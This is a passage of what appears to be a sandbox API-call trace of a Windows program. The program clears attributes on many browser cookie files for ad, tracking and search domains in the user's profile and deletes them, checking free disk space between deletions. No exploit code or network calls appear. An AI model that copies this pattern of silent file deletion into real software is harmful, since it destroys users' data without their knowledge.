CoTaskMemFree (pv=0x4e1c10) [0149.280] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0149.280] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0149.281] CoTaskMemFree (pv=0x4e1c10) [0149.281] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0149.281] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0149.281] CoTaskMemFree (pv=0x4e1c10) [0149.282] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0149.288] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@adobe[1].txt", dwFileAttributes=0x80) returned 1 [0149.288] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@adobe[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@adobe[1].txt")) returned 1 [0149.291] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0149.297] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@adobe[3].txt", dwFileAttributes=0x80) returned 1 [0149.297] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@adobe[3].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@adobe[3].txt")) returned 1 [0149.301] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0149.306] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@demdex[1].txt", dwFileAttributes=0x80) returned 1 [0149.306] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@demdex[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@demdex[1].txt")) returned 1 [0149.311] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0149.316] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt", dwFileAttributes=0x80) returned 1 [0149.317] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt")) returned 1 [0149.320] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0149.325] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@everesttech[1].txt", dwFileAttributes=0x80) returned 1 [0149.325] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@everesttech[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@everesttech[1].txt")) returned 1 [0149.329] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0149.334] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@google[2].txt", dwFileAttributes=0x80) returned 1 [0149.335] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@google[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@google[2].txt")) returned 1 [0149.337] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0149.343] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@ml314[1].txt", dwFileAttributes=0x80) returned 1 [0149.343] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@ml314[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@ml314[1].txt")) returned 1 [0149.347] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0149.352] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@rlcdn[2].txt", dwFileAttributes=0x80) returned 1 [0149.352] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@rlcdn[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@rlcdn[2].txt")) returned 1 [0149.355] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0149.355] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0149.355] CoTaskMemFree (pv=0x4e1c10) [0149.361] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0149.371] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt", dwFileAttributes=0x80) returned 1 [0149.372] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt")) returned 1 [0149.374] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0149.380] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt", dwFileAttributes=0x80) returned 1 [0149.380] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt")) returned 1 [0149.383] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0149.389] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adformdsp[1].txt", dwFileAttributes=0x80) returned 1 [0149.389] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adformdsp[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adformdsp[1].txt")) returned 1 [0149.392] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0149.398] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adform[1].txt", dwFileAttributes=0x80) returned 1 [0149.399] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adform[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adform[1].txt")) returned 1 [0149.402] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0149.408] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adnxs[1].txt", dwFileAttributes=0x80) returned 1 [0149.408] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adnxs[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adnxs[1].txt")) returned 1 [0149.411] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0149.416] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adtech[2].txt", dwFileAttributes=0x80) returned 1 [0149.416] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adtech[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adtech[2].txt")) returned 1 [0149.419] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0149.424] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adtr02[1].txt", dwFileAttributes=0x80) returned 1 [0149.424] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adtr02[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adtr02[1].txt")) returned 1 [0149.427] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0149.433] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@advertising[1].txt", dwFileAttributes=0x80) returned 1 [0149.434] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@advertising[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@advertising[1].txt")) returned 1 [0149.437] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0149.442] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@api.bing[2].txt", dwFileAttributes=0x80) returned 1 [0149.442] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@api.bing[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@api.bing[2].txt")) returned 1 [0149.445] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0149.450] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@at.atwola[1].txt", dwFileAttributes=0x80) returned 1 [0149.451] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@at.atwola[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@at.atwola[1].txt")) returned 1 [0149.453] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0149.458] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@bing[1].txt", dwFileAttributes=0x80) returned 1 [0149.459] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@bing[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@bing[1].txt")) returned 1 [0149.461] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0149.466] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@c.bing[1].txt", dwFileAttributes=0x80) returned 1 [0149.467] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@c.bing[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@c.bing[1].txt")) returned 1 [0149.470] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0149.475] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@c.msn[1].txt", dwFileAttributes=0x80) returned 1 [0149.475] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@c.msn[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@c.msn[1].txt")) returned 1 [0149.479] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0149.484] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@doubleclick[2].txt", dwFileAttributes=0x80) returned 1 [0149.484] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@doubleclick[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@doubleclick[2].txt")) returned 1 [0149.487] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0149.492] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[1].txt", dwFileAttributes=0x80) returned 1 [0149.493] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@google[1].txt")) returned 1 [0149.496] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0149.501] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[3].txt", dwFileAttributes=0x80) returned 1 [0149.501] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[3].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@google[3].txt")) returned 1 [0149.504] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0149.508] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[4].txt", dwFileAttributes=0x80) returned 1 [0149.509] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[4].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@google[4].txt")) returned 1 [0149.512] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0149.517] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@linkedin[1].txt", dwFileAttributes=0x80) returned 1 [0149.517] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@linkedin[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@linkedin[1].txt")) returned 1 [0149.520] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0149.526] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@m.exactag[1].txt", dwFileAttributes=0x80) returned 1 [0149.526] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@m.exactag[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@m.exactag[1].txt")) returned 1 [0149.530] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0149.535] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@msn[1].txt", dwFileAttributes=0x80) returned 1 [0149.536] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@msn[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@msn[1].txt")) returned 1 [0149.538] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, 